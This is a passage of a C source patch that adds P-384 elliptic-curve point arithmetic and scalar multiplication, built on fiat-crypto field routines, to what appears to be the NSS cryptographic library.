UINT64_C(0x0CBE52B68E2BFCD4), ++ UINT64_C(0xB1D5E261118C91B2), UINT64_C(0x93CFF6DA71D8F2BC) } }, ++ { { UINT64_C(0x5F5BC06B8AB58944), UINT64_C(0xE4BED5384979882D), ++ UINT64_C(0x57C30362D79B0EB1), UINT64_C(0x391AE2C1EF7C56D8), ++ UINT64_C(0x28BC2E97ADD98625), UINT64_C(0xFA8E86B81B257107) }, ++ { UINT64_C(0x5E4859F86118C715), UINT64_C(0x91C83324524C71DD), ++ UINT64_C(0xFB2092436D2F5E6D), UINT64_C(0x6B4FE21F2A900A43), ++ UINT64_C(0x241F75D632A73C1F), UINT64_C(0xF5BC46295AE89613) } }, ++ } ++}; ++ ++/*- ++ * Q := 2P, both projective, Q and P same pointers OK ++ * Autogenerated: op3/dbl_proj.op3 ++ * https://eprint.iacr.org/2015/1060 Alg 6 ++ * ASSERT: a = -3 ++ */ ++static void ++point_double(pt_prj_t *Q, const pt_prj_t *P) ++{ ++ /* temporary variables */ ++ fe_t t0, t1, t2, t3, t4; ++ /* constants */ ++ const limb_t *b = const_b; ++ /* set pointers for legacy curve arith */ ++ const limb_t *X = P->X; ++ const limb_t *Y = P->Y; ++ const limb_t *Z = P->Z; ++ limb_t *X3 = Q->X; ++ limb_t *Y3 = Q->Y; ++ limb_t *Z3 = Q->Z; ++ ++ /* the curve arith formula */ ++ fiat_secp384r1_square(t0, X); ++ fiat_secp384r1_square(t1, Y); ++ fiat_secp384r1_square(t2, Z); ++ fiat_secp384r1_mul(t3, X, Y); ++ fiat_secp384r1_add(t3, t3, t3); ++ fiat_secp384r1_mul(t4, Y, Z); ++ fiat_secp384r1_mul(Z3, X, Z); ++ fiat_secp384r1_add(Z3, Z3, Z3); ++ fiat_secp384r1_mul(Y3, b, t2); ++ fiat_secp384r1_sub(Y3, Y3, Z3); ++ fiat_secp384r1_add(X3, Y3, Y3); ++ fiat_secp384r1_add(Y3, X3, Y3); ++ fiat_secp384r1_sub(X3, t1, Y3); ++ fiat_secp384r1_add(Y3, t1, Y3); ++ fiat_secp384r1_mul(Y3, X3, Y3); ++ fiat_secp384r1_mul(X3, X3, t3); ++ fiat_secp384r1_add(t3, t2, t2); ++ fiat_secp384r1_add(t2, t2, t3); ++ fiat_secp384r1_mul(Z3, b, Z3); ++ fiat_secp384r1_sub(Z3, Z3, t2); ++ fiat_secp384r1_sub(Z3, Z3, t0); ++ fiat_secp384r1_add(t3, Z3, Z3); ++ fiat_secp384r1_add(Z3, Z3, t3); ++ fiat_secp384r1_add(t3, t0, t0); ++ fiat_secp384r1_add(t0, t3, t0); ++ fiat_secp384r1_sub(t0, t0, t2); ++ fiat_secp384r1_mul(t0, t0, Z3); ++ fiat_secp384r1_add(Y3, Y3, t0); ++ fiat_secp384r1_add(t0, t4, t4); ++ fiat_secp384r1_mul(Z3, t0, Z3); ++ fiat_secp384r1_sub(X3, X3, Z3); ++ fiat_secp384r1_mul(Z3, t0, t1); ++ fiat_secp384r1_add(Z3, Z3, Z3); ++ fiat_secp384r1_add(Z3, Z3, Z3); ++} ++ ++/*- ++ * R := Q + P where R and Q are projective, P affine. ++ * R and Q same pointers OK ++ * R and P same pointers not OK ++ * Autogenerated: op3/add_mixed.op3 ++ * https://eprint.iacr.org/2015/1060 Alg 5 ++ * ASSERT: a = -3 ++ */ ++static void ++point_add_mixed(pt_prj_t *R, const pt_prj_t *Q, const pt_aff_t *P) ++{ ++ /* temporary variables */ ++ fe_t t0, t1, t2, t3, t4; ++ /* constants */ ++ const limb_t *b = const_b; ++ /* set pointers for legacy curve arith */ ++ const limb_t *X1 = Q->X; ++ const limb_t *Y1 = Q->Y; ++ const limb_t *Z1 = Q->Z; ++ const limb_t *X2 = P->X; ++ const limb_t *Y2 = P->Y; ++ fe_t X3; ++ fe_t Y3; ++ fe_t Z3; ++ limb_t nz; ++ ++ /* check P for affine inf */ ++ fiat_secp384r1_nonzero(&nz, P->Y); ++ ++ /* the curve arith formula */ ++ fiat_secp384r1_mul(t0, X1, X2); ++ fiat_secp384r1_mul(t1, Y1, Y2); ++ fiat_secp384r1_add(t3, X2, Y2); ++ fiat_secp384r1_add(t4, X1, Y1); ++ fiat_secp384r1_mul(t3, t3, t4); ++ fiat_secp384r1_add(t4, t0, t1); ++ fiat_secp384r1_sub(t3, t3, t4); ++ fiat_secp384r1_mul(t4, Y2, Z1); ++ fiat_secp384r1_add(t4, t4, Y1); ++ fiat_secp384r1_mul(Y3, X2, Z1); ++ fiat_secp384r1_add(Y3, Y3, X1); ++ fiat_secp384r1_mul(Z3, b, Z1); ++ fiat_secp384r1_sub(X3, Y3, Z3); ++ fiat_secp384r1_add(Z3, X3, X3); ++ fiat_secp384r1_add(X3, X3, Z3); ++ fiat_secp384r1_sub(Z3, t1, X3); ++ fiat_secp384r1_add(X3, t1, X3); ++ fiat_secp384r1_mul(Y3, b, Y3); ++ fiat_secp384r1_add(t1, Z1, Z1); ++ fiat_secp384r1_add(t2, t1, Z1); ++ fiat_secp384r1_sub(Y3, Y3, t2); ++ fiat_secp384r1_sub(Y3, Y3, t0); ++ fiat_secp384r1_add(t1, Y3, Y3); ++ fiat_secp384r1_add(Y3, t1, Y3); ++ fiat_secp384r1_add(t1, t0, t0); ++ fiat_secp384r1_add(t0, t1, t0); ++ fiat_secp384r1_sub(t0, t0, t2); ++ fiat_secp384r1_mul(t1, t4, Y3); ++ fiat_secp384r1_mul(t2, t0, Y3); ++ fiat_secp384r1_mul(Y3, X3, Z3); ++ fiat_secp384r1_add(Y3, Y3, t2); ++ fiat_secp384r1_mul(X3, t3, X3); ++ fiat_secp384r1_sub(X3, X3, t1); ++ fiat_secp384r1_mul(Z3, t4, Z3); ++ fiat_secp384r1_mul(t1, t3, t0); ++ fiat_secp384r1_add(Z3, Z3, t1); ++ ++ /* if P is inf, throw all that away and take Q */ ++ fiat_secp384r1_selectznz(R->X, nz, Q->X, X3); ++ fiat_secp384r1_selectznz(R->Y, nz, Q->Y, Y3); ++ fiat_secp384r1_selectznz(R->Z, nz, Q->Z, Z3); ++} ++ ++/*- ++ * R := Q + P all projective. ++ * R and Q same pointers OK ++ * R and P same pointers not OK ++ * Autogenerated: op3/add_proj.op3 ++ * https://eprint.iacr.org/2015/1060 Alg 4 ++ * ASSERT: a = -3 ++ */ ++static void ++point_add_proj(pt_prj_t *R, const pt_prj_t *Q, const pt_prj_t *P) ++{ ++ /* temporary variables */ ++ fe_t t0, t1, t2, t3, t4, t5; ++ /* constants */ ++ const limb_t *b = const_b; ++ /* set pointers for legacy curve arith */ ++ const limb_t *X1 = Q->X; ++ const limb_t *Y1 = Q->Y; ++ const limb_t *Z1 = Q->Z; ++ const limb_t *X2 = P->X; ++ const limb_t *Y2 = P->Y; ++ const limb_t *Z2 = P->Z; ++ limb_t *X3 = R->X; ++ limb_t *Y3 = R->Y; ++ limb_t *Z3 = R->Z; ++ ++ /* the curve arith formula */ ++ fiat_secp384r1_mul(t0, X1, X2); ++ fiat_secp384r1_mul(t1, Y1, Y2); ++ fiat_secp384r1_mul(t2, Z1, Z2); ++ fiat_secp384r1_add(t3, X1, Y1); ++ fiat_secp384r1_add(t4, X2, Y2); ++ fiat_secp384r1_mul(t3, t3, t4); ++ fiat_secp384r1_add(t4, t0, t1); ++ fiat_secp384r1_sub(t3, t3, t4); ++ fiat_secp384r1_add(t4, Y1, Z1); ++ fiat_secp384r1_add(t5, Y2, Z2); ++ fiat_secp384r1_mul(t4, t4, t5); ++ fiat_secp384r1_add(t5, t1, t2); ++ fiat_secp384r1_sub(t4, t4, t5); ++ fiat_secp384r1_add(X3, X1, Z1); ++ fiat_secp384r1_add(Y3, X2, Z2); ++ fiat_secp384r1_mul(X3, X3, Y3); ++ fiat_secp384r1_add(Y3, t0, t2); ++ fiat_secp384r1_sub(Y3, X3, Y3); ++ fiat_secp384r1_mul(Z3, b, t2); ++ fiat_secp384r1_sub(X3, Y3, Z3); ++ fiat_secp384r1_add(Z3, X3, X3); ++ fiat_secp384r1_add(X3, X3, Z3); ++ fiat_secp384r1_sub(Z3, t1, X3); ++ fiat_secp384r1_add(X3, t1, X3); ++ fiat_secp384r1_mul(Y3, b, Y3); ++ fiat_secp384r1_add(t1, t2, t2); ++ fiat_secp384r1_add(t2, t1, t2); ++ fiat_secp384r1_sub(Y3, Y3, t2); ++ fiat_secp384r1_sub(Y3, Y3, t0); ++ fiat_secp384r1_add(t1, Y3, Y3); ++ fiat_secp384r1_add(Y3, t1, Y3); ++ fiat_secp384r1_add(t1, t0, t0); ++ fiat_secp384r1_add(t0, t1, t0); ++ fiat_secp384r1_sub(t0, t0, t2); ++ fiat_secp384r1_mul(t1, t4, Y3); ++ fiat_secp384r1_mul(t2, t0, Y3); ++ fiat_secp384r1_mul(Y3, X3, Z3); ++ fiat_secp384r1_add(Y3, Y3, t2); ++ fiat_secp384r1_mul(X3, t3, X3); ++ fiat_secp384r1_sub(X3, X3, t1); ++ fiat_secp384r1_mul(Z3, t4, Z3); ++ fiat_secp384r1_mul(t1, t3, t0); ++ fiat_secp384r1_add(Z3, Z3, t1); ++} ++ ++/* constants */ ++#define RADIX 5 ++#define DRADIX (1 << RADIX) ++#define DRADIX_WNAF ((DRADIX) << 1) ++ ++/*- ++ * precomp for wnaf scalar multiplication: ++ * precomp[0] = 1P ++ * precomp[1] = 3P ++ * precomp[2] = 5P ++ * precomp[3] = 7P ++ * precomp[4] = 9P ++ * ... ++ */ ++static void ++precomp_wnaf(pt_prj_t precomp[DRADIX / 2], const pt_aff_t *P) ++{ ++ int i; ++ ++ fe_copy(precomp[0].X, P->X); ++ fe_copy(precomp[0].Y, P->Y); ++ fe_copy(precomp[0].Z, const_one); ++ point_double(&precomp[DRADIX / 2 - 1], &precomp[0]); ++ ++ for (i = 1; i < DRADIX / 2; i++) ++ point_add_proj(&precomp[i], &precomp[DRADIX / 2 - 1], &precomp[i - 1]); ++} ++ ++/* fetch a scalar bit */ ++static int ++scalar_get_bit(const unsigned char in[48], int idx) ++{ ++ int widx, rshift; ++ ++ widx = idx >> 3; ++ rshift = idx & 0x7; ++ ++ if (idx < 0 || widx >= 48) ++ return 0; ++ ++ return (in[widx] >> rshift) & 0x1; ++} ++ ++/*- ++ * Compute "regular" wnaf representation of a scalar. ++ * See "Exponent Recoding and Regular Exponentiation Algorithms", ++ * Tunstall et al., AfricaCrypt 2009, Alg 6. ++ * It forces an odd scalar and outputs digits in ++ * {\pm 1, \pm 3, \pm 5, \pm 7, \pm 9, ...} ++ * i.e. signed odd digits with _no zeroes_ -- that makes it "regular". ++ */ ++static void ++scalar_rwnaf(int8_t out[77], const unsigned char in[48]) ++{ ++ int i; ++ int8_t window, d; ++ ++ window = (in[0] & (DRADIX_WNAF - 1)) | 1; ++ for (i = 0; i < 76; i++) { ++ d = (window & (DRADIX_WNAF - 1)) - DRADIX; ++ out[i] = d; ++ window = (window - d) >> RADIX; ++ window += scalar_get_bit(in, (i + 1) * RADIX + 1) << 1; ++ window += scalar_get_bit(in, (i + 1) * RADIX + 2) << 2; ++ window += scalar_get_bit(in, (i + 1) * RADIX + 3) << 3; ++ window += scalar_get_bit(in, (i + 1) * RADIX + 4) << 4; ++ window += scalar_get_bit(in, (i + 1) * RADIX + 5) << 5; ++ } ++ out[i] = window; ++} ++ ++/*- ++ * Compute "textbook" wnaf representation of a scalar. ++ * NB: not constant time ++ */ ++static void ++scalar_wnaf(int8_t out[385], const unsigned char in[48]) ++{ ++ int i; ++ int8_t window, d; ++ ++ window = in[0] & (DRADIX_WNAF - 1); ++ for (i = 0; i < 385; i++) { ++ d = 0; ++ if ((window & 1) && ((d = window & (DRADIX_WNAF - 1)) & DRADIX)) ++ d -= DRADIX_WNAF; ++ out[i] = d; ++ window = (window - d) >> 1; ++ window += scalar_get_bit(in, i + 1 + RADIX) << RADIX; ++ } ++} ++ ++/*- ++ * Simulateous scalar multiplication: interleaved "textbook" wnaf. ++ * NB: not constant time ++ */ ++static void ++var_smul_wnaf_two(pt_aff_t *out, const unsigned char a[48], ++ const unsigned char b[48], const pt_aff_t *P) ++{ ++ int i, d, is_neg, is_inf = 1, flipped = 0; ++ int8_t anaf[385] = { 0 }; ++ int8_t bnaf[385] = { 0 }; ++ pt_prj_t Q; ++ pt_prj_t precomp[DRADIX / 2]; ++ ++ precomp_wnaf(precomp, P); ++ scalar_wnaf(anaf, a); ++ scalar_wnaf(bnaf, b); ++ ++ for (i = 384; i >= 0; i--) { ++ if (!is_inf) ++ point_double(&Q, &Q); ++ if ((d = bnaf[i])) { ++ if ((is_neg = d < 0) != flipped) { ++ fiat_secp384r1_opp(Q.Y, Q.Y); ++ flipped ^= 1; ++ } ++ d = (is_neg) ? (-d - 1) >> 1 : (d - 1) >> 1; ++ if (is_inf) { ++ /* initialize accumulator */ ++ fe_copy(Q.X, &precomp[d].X); ++ fe_copy(Q.Y, &precomp[d].Y); ++ fe_copy(Q.Z, &precomp[d].Z); ++ is_inf = 0; ++ } else ++ point_add_proj(&Q, &Q, &precomp[d]); ++ } ++ if ((d = anaf[i])) { ++ if ((is_neg = d < 0) != flipped) { ++ fiat_secp384r1_opp(Q.Y, Q.Y); ++ flipped ^= 1; ++ } ++ d = (is_neg) ? (-d - 1) >> 1 : (d - 1) >> 1; ++ if (is_inf) { ++ /* initialize accumulator */ ++ fe_copy(Q.X, &lut_cmb[0][d].X); ++ fe_copy(Q.Y, &lut_cmb[0][d].Y); ++ fe_copy(Q.Z, const_one); ++ is_inf = 0; ++ } else ++ point_add_mixed(&Q, &Q, &lut_cmb[0][d]); ++ } ++ } ++ ++ if (is_inf) { ++ /* initialize accumulator to inf: all-zero scalars */ ++ fe_set_zero(Q.X); ++ fe_copy(Q.Y, const_one); ++ fe_set_zero(Q.Z); ++ } ++ ++ if (flipped) { ++ /* correct sign */ ++ fiat_secp384r1_opp(Q.Y, Q.Y); ++ } ++ ++ /* convert to affine -- NB depends on coordinate system */ ++ fiat_secp384r1_inv(Q.Z, Q.Z); ++ fiat_secp384r1_mul(out->X, Q.X, Q.Z); ++ fiat_secp384r1_mul(out->Y, Q.Y, Q.Z); ++} ++ ++/*- ++ * Variable point scalar multiplication with "regular" wnaf. ++ */ ++static void ++var_smul_rwnaf(pt_aff_t *out, const unsigned char scalar[48], ++ const pt_aff_t *P) ++{ ++ int i, j, d, diff, is_neg; ++ int8_t rnaf[77] = { 0 }; ++ pt_prj_t Q, lut; ++ pt_prj_t precomp[DRADIX / 2]; ++ ++ precomp_wnaf(precomp, P); ++ scalar_rwnaf(rnaf, scalar); ++ ++#if defined(_MSC_VER) ++/* result still unsigned: yes we know */ ++#pragma warning(push) ++#pragma warning(disable : 4146) ++#endif ++ ++ /* initialize accumulator to high digit */ ++ d = (rnaf[76] - 1) >> 1; ++ for (j = 0; j < DRADIX / 2; j++) { ++ diff = (1 - (-(d ^ j) >> (8 * sizeof(int) - 1))) & 1; ++ fiat_secp384r1_selectznz(Q.X, diff, Q.X, precomp[j].X); ++ fiat_secp384r1_selectznz(Q.Y, diff, Q.Y, precomp[j].Y); ++ fiat_secp384r1_selectznz(Q.Z, diff, Q.Z, precomp[j].Z); ++ } ++ ++ for (i = 75; i >= 0; i--) { ++ for (j = 0; j < RADIX; j++) ++ point_double(&Q, &Q); ++ d = rnaf[i]; ++ /* is_neg = (d < 0) ? 1 : 0 */ ++ is_neg = (d >> (8 * sizeof(int) - 1)) & 1; ++ /* d = abs(d) */ ++ d = (d ^ -is_neg) + is_neg; ++ d = (d - 1) >> 1; ++ for (j = 0; j < DRADIX / 2; j++) { ++ diff = (1 - (-(d ^ j) >> (8 * sizeof(int) - 1))) & 1; ++ fiat_secp384r1_selectznz(lut.X, diff, lut.X, precomp[j].X); ++ fiat_secp384r1_selectznz(lut.Y, diff, lut.Y, precomp[j].Y); ++ fiat_secp384r1_selectznz(lut.Z, diff, lut.Z, precomp[j].Z); ++ } ++ /* negate lut point if digit is negative */ ++ fiat_secp384r1_opp(out->Y, lut.Y); ++ fiat_secp384r1_selectznz(lut.Y, is_neg, lut.Y, out->Y); ++ point_add_proj(&Q, &Q, &lut); ++ } ++ ++#if defined(_MSC_VER) ++#pragma warning(pop) ++#endif ++ ++ /* conditionally subtract P if the scalar was even */ ++ fe_copy(lut.X, precomp[0].X); ++ fiat_secp384r1_opp(lut.Y, precomp[0].Y); ++ fe_copy(lut.Z, precomp[0].Z); ++ point_add_proj(&lut, &lut, &Q); ++ fiat_secp384r1_selectznz(Q.X, scalar[0] & 1, lut.X, Q.X); ++ fiat_secp384r1_selectznz(Q.Y, scalar[0] & 1, lut.Y, Q.Y); ++ fiat_secp384r1_selectznz(Q.Z, scalar[0] & 1, lut.Z, Q.Z); ++ ++ /* convert to affine -- NB depends on coordinate system */ ++ fiat_secp384r1_inv(Q.Z, Q.Z); ++ fiat_secp384r1_mul(out->X, Q.X, Q.Z); ++ fiat_secp384r1_mul(out->Y, Q.Y, Q.Z); ++} ++ ++/*- ++ * Fixed scalar multiplication: comb with interleaving. ++ */ ++static void ++fixed_smul_cmb(pt_aff_t *out, const unsigned char scalar[48]) ++{ ++ int i, j, k, d, diff, is_neg = 0; ++ int8_t rnaf[77] = { 0 }; ++ pt_prj_t Q, R; ++ pt_aff_t lut; ++ ++ scalar_rwnaf(rnaf, scalar); ++ ++ /* initalize accumulator to inf */ ++ fe_set_zero(Q.X); ++ fe_copy(Q.Y, const_one); ++ fe_set_zero(Q.Z); ++ ++#if defined(_MSC_VER) ++/* result still unsigned: yes we know */ ++#pragma warning(push) ++#pragma warning(disable : 4146) ++#endif ++ ++ for (i = 3; i >= 0; i--) { ++ for (j = 0; i != 3 && j < RADIX; j++) ++ point_double(&Q, &Q); ++ for (j = 0; j < 21; j++) { ++ if (j * 4 + i > 76) ++ continue; ++ d = rnaf[j * 4 + i]; ++ /* is_neg = (d < 0) ? 1 : 0 */ ++ is_neg = (d >> (8 * sizeof(int) - 1)) & 1; ++ /* d = abs(d) */ ++ d = (d ^ -is_neg) + is_neg; ++ d = (d - 1) >> 1; ++ for (k = 0; k < DRADIX / 2; k++) { ++ diff = (1 - (-(d ^ k) >> (8 * sizeof(int) - 1))) & 1; ++ fiat_secp384r1_selectznz(lut.X, diff, lut.X, lut_cmb[j][k].X); ++ fiat_secp384r1_selectznz(lut.Y, diff, lut.Y, lut_cmb[j][k].Y); ++ } ++ /* negate lut point if digit is negative */ ++ fiat_secp384r1_opp(out->Y, lut.Y); ++ fiat_secp384r1_selectznz(lut.Y, is_neg, lut.Y, out->Y); ++ point_add_mixed(&Q, &Q, &lut); ++ } ++ } ++ ++#if defined(_MSC_VER) ++#pragma warning(pop) ++#endif ++ ++ /* conditionally subtract P if the scalar was even */ ++ fe_copy(lut.X, lut_cmb[0][0].X); ++ fiat_secp384r1_opp(lut.Y, lut_cmb[0][0].Y); ++ point_add_mixed(&R, &Q, &lut); ++ fiat_secp384r1_selectznz(Q.X, scalar[0] & 1, R.X, Q.X); ++ fiat_secp384r1_selectznz(Q.Y, scalar[0] & 1, R.Y, Q.Y); ++ fiat_secp384r1_selectznz(Q.Z, scalar[0] & 1, R.Z, Q.Z); ++ ++ /* convert to affine -- NB depends on coordinate system */ ++ fiat_secp384r1_inv(Q.Z, Q.Z); ++ fiat_secp384r1_mul(out->X, Q.X, Q.Z); ++ fiat_secp384r1_mul(out->Y, Q.Y, Q.Z); ++} ++ ++static void ++point_mul_two(unsigned char outx[48], unsigned char outy[48], ++ const unsigned char a[48], const unsigned char b[48], ++ const unsigned char inx[48], ++ const unsigned char iny[48]) ++{ ++ pt_aff_t P; ++ ++ fiat_secp384r1_from_bytes(P.X, inx); ++ fiat_secp384r1_from_bytes(P.Y, iny); ++ fiat_secp384r1_to_montgomery(P.X, P.X); ++ fiat_secp384r1_to_montgomery(P.Y, P.Y); ++ /* simultaneous scalar multiplication */ ++ var_smul_wnaf_two(&P, a, b, &P); ++ ++ fiat_secp384r1_from_montgomery(P.X, P.X); ++ fiat_secp384r1_from_montgomery(P.Y, P.Y); ++ fiat_secp384r1_to_bytes(outx, P.X); ++ fiat_secp384r1_to_bytes(outy, P.Y); ++} ++ ++static void ++point_mul_g(unsigned char outx[48], unsigned char outy[48], ++ const unsigned char scalar[48]) ++{ ++ pt_aff_t P; ++ ++ /* fixed scmul function */ ++ fixed_smul_cmb(&P, scalar); ++ fiat_secp384r1_from_montgomery(P.X, P.X); ++ fiat_secp384r1_from_montgomery(P.Y, P.Y); ++ fiat_secp384r1_to_bytes(outx, P.X); ++ fiat_secp384r1_to_bytes(outy, P.Y); ++} ++ ++static void ++point_mul(unsigned char outx[48], unsigned char outy[48], ++ const unsigned char scalar[48], ++ const unsigned char inx[48], ++ const unsigned char iny[48]) ++{ ++ pt_aff_t P; ++ ++ fiat_secp384r1_from_bytes(P.X, inx); ++ fiat_secp384r1_from_bytes(P.Y, iny); ++ fiat_secp384r1_to_montgomery(P.X, P.X); ++ fiat_secp384r1_to_montgomery(P.Y, P.Y); ++ /* var scmul function */ ++ var_smul_rwnaf(&P, scalar, &P); ++ fiat_secp384r1_from_montgomery(P.X, P.X); ++ fiat_secp384r1_from_montgomery(P.Y, P.Y); ++ fiat_secp384r1_to_bytes(outx, P.X); ++ fiat_secp384r1_to_bytes(outy, P.Y); ++} ++ ++#undef RADIX ++#include "ecp.h" ++#include "mplogic.h" ++ ++/*- ++ * reverse bytes -- total hack ++ */ ++#define MP_BE2LE(a) \ ++ do { \ ++ unsigned char z_bswap; \ ++ z_bswap = a[0]; \ ++ a[0] = a[47]; \ ++ a[47] = z_bswap; \ ++ z_bswap = a[1]; \ ++ a[1] = a[46]; \ ++ a[46] = z_bswap; \ ++ z_bswap = a[2]; \ ++ a[2] = a[45]; \ ++ a[45] = z_bswap; \ ++ z_bswap = a[3]; \ ++ a[3] = a[44]; \ ++ a[44] = z_bswap; \ ++ z_bswap = a[4]; \ ++ a[4] = a[43]; \ ++ a[43] = z_bswap; \ ++ z_bswap = a[5]; \ ++ a[5] = a[42]; \ ++ a[42] = z_bswap; \ ++ z_bswap = a[6]; \ ++ a[6] = a[41]; \ ++ a[41] = z_bswap; \ ++ z_bswap = a[7]; \ ++ a[7] = a[40]; \ ++ a[40] = z_bswap; \ ++ z_bswap = a[8]; \ ++ a[8] = a[39]; \ ++ a[39] = z_bswap; \ ++ z_bswap = a[9]; \ ++ a[9] = a[38]; \ ++ a[38] = z_bswap; \ ++ z_bswap = a[10]; \ ++ a[10] = a[37]; \ ++ a[37] = z_bswap; \ ++ z_bswap = a[11]; \ ++ a[11] = a[36]; \ ++ a[36] = z_bswap; \ ++ z_bswap = a[12]; \ ++ a[12] = a[35]; \ ++ a[35] = z_bswap; \ ++ z_bswap = a[13]; \ ++ a[13] = a[34]; \ ++ a[34] = z_bswap; \ ++ z_bswap = a[14]; \ ++ a[14] = a[33]; \ ++ a[33] = z_bswap; \ ++ z_bswap = a[15]; \ ++ a[15] = a[32]; \ ++ a[32] = z_bswap; \ ++ z_bswap = a[16]; \ ++ a[16] = a[31]; \ ++ a[31] = z_bswap; \ ++ z_bswap = a[17]; \ ++ a[17] = a[30]; \ ++ a[30] = z_bswap; \ ++ z_bswap = a[18]; \ ++ a[18] = a[29]; \ ++ a[29] = z_bswap; \ ++ z_bswap = a[19]; \ ++ a[19] = a[28]; \ ++ a[28] = z_bswap; \ ++ z_bswap = a[20]; \ ++ a[20] = a[27]; \ ++ a[27] = z_bswap; \ ++ z_bswap = a[21]; \ ++ a[21] = a[26]; \ ++ a[26] = z_bswap; \ ++ z_bswap = a[22]; \ ++ a[22] = a[25]; \ ++ a[25] = z_bswap; \ ++ z_bswap = a[23]; \ ++ a[23] = a[24]; \ ++ a[24] = z_bswap; \ ++ } while (0) ++ ++static mp_err ++point_mul_g_secp384r1(const mp_int *n, mp_int *out_x, ++ mp_int *out_y, const ECGroup *group) ++{ ++ unsigned char b_x[48]; ++ unsigned char b_y[48]; ++ unsigned char b_n[48]; ++ mp_err res; ++ ++ ARGCHK(n != NULL && out_x != NULL && out_y != NULL, MP_BADARG); ++ ++ /* fail on out of range scalars */ ++ if (mpl_significant_bits(n) > 384 || mp_cmp_z(n) != 1) ++ return MP_RANGE; ++ ++ MP_CHECKOK(mp_to_fixlen_octets(n, b_n, 48)); ++ MP_BE2LE(b_n); ++ point_mul_g(b_x, b_y, b_n); ++ MP_BE2LE(b_x); ++ MP_BE2LE(b_y); ++ MP_CHECKOK(mp_read_unsigned_octets(out_x, b_x, 48)); ++ MP_CHECKOK(mp_read_unsigned_octets(out_y, b_y, 48)); ++ ++CLEANUP: ++ return res; ++} ++ ++static mp_err ++point_mul_secp384r1(const mp_int *n, const mp_int *in_x, ++ const mp_int *in_y, mp_int *out_x, ++ mp_int *out_y, const ECGroup *group) ++{ ++ unsigned char b_x[48]; ++ unsigned char b_y[48]; ++ unsigned char b_n[48]; ++ mp_err res; ++ ++ ARGCHK(n != NULL && in_x != NULL && in_y != NULL && out_x != NULL && ++ out_y != NULL, ++ MP_BADARG); ++ ++ /* fail on out of range scalars */ ++ if (mpl_significant_bits(n) > 384 || mp_cmp_z(n) != 1) ++ return MP_RANGE; ++ ++ MP_CHECKOK(mp_to_fixlen_octets(n, b_n, 48)); ++ MP_CHECKOK(mp_to_fixlen_octets(in_x, b_x, 48)); ++ MP_CHECKOK(mp_to_fixlen_octets(in_y, b_y, 48)); ++ MP_BE2LE(b_x); ++ MP_BE2LE(b_y); ++ MP_BE2LE(b_n); ++ point_mul(b_x, b_y, b_n, b_x, b_y); ++ MP_BE2LE(b_x); ++ MP_BE2LE(b_y); ++ MP_CHECKOK(mp_read_unsigned_octets(out_x, b_x, 48)); ++ MP_CHECKOK(mp_read_unsigned_octets(out_y, b_y, 48)); ++ ++CLEANUP: ++ return res; ++} ++ ++static mp_err ++point_mul_two_secp384r1(const mp_int *n1, const mp_int *n2, ++ const mp_int *in_x, const mp_int *in_y, ++ mp_int *out_x, mp_int *out_y, ++ const ECGroup *group) ++{ ++ unsigned char b_x[48]; ++ unsigned char b_y[48]; ++ unsigned char b_n1[48]; ++ unsigned char b_n2[48]; ++ mp_err res; ++ ++ /* If n2 == NULL, this is just a base-point multiplication. */ ++ if (n2 == NULL) ++ return point_mul_g_secp384r1(n1, out_x, out_y, group); ++ ++ /* If n1 == NULL, this is just an arbitary-point multiplication. */ ++ if (n1 == NULL) ++ return point_mul_secp384r1(n2, in_x, in_y, out_x, out_y, group); ++ ++ ARGCHK(in_x != NULL && in_y != NULL && out_x != NULL && out_y != NULL, ++ MP_BADARG); ++ ++ /* fail on out of range scalars */ ++ if (mpl_significant_bits(n1) > 384 || mp_cmp_z(n1) != 1 || ++ mpl_significant_bits(n2) > 384 || mp_cmp_z(n2) != 1) ++ return MP_RANGE; ++ ++ MP_CHECKOK(mp_to_fixlen_octets(n1, b_n1, 48)); ++ MP_CHECKOK(mp_to_fixlen_octets(n2, b_n2, 48)); ++ MP_CHECKOK(mp_to_fixlen_octets(in_x, b_x, 48)); ++ MP_CHECKOK(mp_to_fixlen_octets(in_y, b_y, 48)); ++ MP_BE2LE(b_x); ++ MP_BE2LE(b_y); ++ MP_BE2LE(b_n1); ++ MP_BE2LE(b_n2); ++ point_mul_two(b_x, b_y, b_n1, b_n2, b_x, b_y); ++ MP_BE2LE(b_x); ++ MP_BE2LE(b_y); ++ MP_CHECKOK(mp_read_unsigned_octets(out_x, b_x, 48)); ++ MP_CHECKOK(mp_read_unsigned_octets(out_y, b_y, 48)); ++ ++CLEANUP: ++ return res; ++} ++ ++mp_err ++ec_group_set_secp384r1(ECGroup *group, ECCurveName name) ++{ ++ if (name == ECCurve_NIST_P384) { ++ group->base_point_mul = &point_mul_g_secp384r1; ++ group->point_mul = &point_mul_secp384r1; ++ group->points_mul = &point_mul_two_secp384r1; ++ } ++ return MP_OKAY; ++} ++ ++#else /* __SIZEOF_INT128__ */ ++ ++#include ++#include ++#define LIMB_BITS 32 ++#define LIMB_CNT 12 ++/* Field elements */ ++typedef uint32_t fe_t[LIMB_CNT]; ++typedef uint32_t limb_t; ++ ++#define fe_copy(d, s) memcpy(d, s, sizeof(fe_t)) ++#define fe_set_zero(d) memset(d, 0, sizeof(fe_t)) ++ ++/* Projective points */ ++typedef struct { ++ fe_t X; ++ fe_t Y; ++ fe_t Z; ++} pt_prj_t; ++ ++/* Affine points */ ++typedef struct { ++ fe_t X; ++ fe_t Y; ++} pt_aff_t; ++ ++/* BEGIN verbatim fiat code https://github.com/mit-plv/fiat-crypto */ ++/*- ++ * MIT License ++ * ++ * Copyright (c) 2020 the fiat-crypto authors (see the AUTHORS file) ++ * ++ * Permission is hereby granted, free of charge, to any person obtaining a copy ++ * of this software and associated documentation files (the "Software"), to deal ++ * in the Software without restriction, including without limitation the rights ++ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell ++ * copies of the Software, and to permit persons to whom the Software is ++ * furnished to do so, subject to the following conditions: ++ * ++ * The above copyright notice and this permission notice shall be included in ++ * all copies or substantial portions of the Software. ++ * ++ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR ++ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, ++ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE ++ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER ++ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, ++ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE ++ * SOFTWARE. ++ */ ++ ++/* 